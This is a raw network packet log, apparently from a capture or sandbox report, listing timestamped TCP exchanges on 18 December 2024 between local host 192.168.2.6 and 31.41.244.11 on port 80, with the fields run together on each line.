                                                                                                                                                              Dec 18, 2024 11:47:16.526479959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.526683092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.526740074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.527470112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.527709007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.527853966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.527901888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.528089046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.528137922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.529090881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.529145002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.529239893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.529284954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.530179024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.530694008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.530749083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.531332970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.531383991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.531536102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.531579018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.532541037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.532594919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.532977104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.533027887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.533718109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.533776045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.534671068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.534725904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.534899950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.534913063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.534946918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.536046028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.536097050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.536124945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.536292076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.537218094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.537278891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.537650108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.537694931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.538413048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.538455963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.538526058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.538582087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.539582014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.539659023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.540340900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.540560961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.540744066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.540849924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.540880919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.540930986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.541944981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.542016029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.542087078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.543087006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.543289900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.543343067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.544264078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.544286013 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.544336081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.545406103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.545454025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.545480967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.546206951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.546580076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.546626091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.547391891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.547432899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.547789097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.547801018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.547846079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.549149036 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.549160957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.549206018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.550120115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.550173044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.550254107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.551350117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.551362038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.551393032 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.551429033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.552439928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.552778006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.552829027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.553616047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.554054976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.554347038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.554400921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.554764986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.554827929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.555787086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.555840015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.555991888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.556006908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.556055069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.557105064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.557528973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.557579041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.558273077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.558350086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.558398962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.559452057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.559669018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.559722900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.559783936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.560621023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.560667038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.561050892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.561496019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.561986923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.562035084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.562485933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.562536001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.563529015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.563580990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.563673973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.564261913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.564713955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.564765930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.565495014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.565541983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.565704107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.565782070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.566088915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.566133976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.567503929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.567604065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.567647934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.567704916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.568587065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.568639040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.568939924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.568988085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.569570065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.569600105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.569653988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.570368052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.570692062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.570744038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.571269989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.571494102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.571553946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.572340012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.572451115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.572499037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.573493004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.573683023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.573707104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.573729992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.574665070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.574713945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.574752092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.575442076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.575845957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.575891018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.576282024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.577158928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.577172041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.577186108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.577220917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.578203917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.578382969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.578464031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.579353094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.579392910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.579833031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.579972982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.580569983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.580585003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.580640078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.580641031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.581729889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.581785917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.581995010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.582066059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.582910061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.582966089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.583448887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.583496094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.584124088 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.584139109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.584175110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.585083961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.585246086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.585258961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.585300922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.715684891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.716145992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.716250896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.716363907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.716377020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.716423035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.717462063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.717514038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.717731953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.718206882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.718573093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.718620062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.718947887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.718998909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.719074965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.719120026 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.720237017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.720293045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.720388889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.720431089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.721295118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.721340895 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.721489906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.721534967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.722472906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.723362923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.723419905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.723658085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.723798990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.723845959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.727016926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.727030039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.727041960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.727054119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.727144957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.727144957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.727535009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.728441000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.728494883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.728734970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.729212046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.729254961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.729990005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.730160952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.730196953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.731168032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.731209040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.731276989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.732397079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.732455015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.732981920 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.733062029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.733104944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.733562946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.734152079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.734227896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.734262943 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.734359980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.735342026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.735397100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.735513926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.736511946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.736560106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.737119913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.737159014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.737679005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.737739086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.737958908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.737996101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.738831043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.739053011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.739094019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.740016937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.740272045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.740322113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.741198063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.741240978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.741525888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.741879940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.742424965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.742474079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.742960930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.743567944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.743580103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.743619919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.744718075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.744779110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.744944096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.744987011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.748559952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.748577118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.748590946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.748605967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.748613119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.748614073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.748632908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.748647928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.748727083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.748763084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.749933004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.750114918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.750138998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.750190020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.751269102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.751332998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.751805067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.752156019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.752207994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.752322912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.753422976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.753464937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.754122972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.754163027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.754489899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.754503012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.754544973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.755614042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.755681992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.756908894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.756920099 CET804980631.41.244.11192.168.2.6
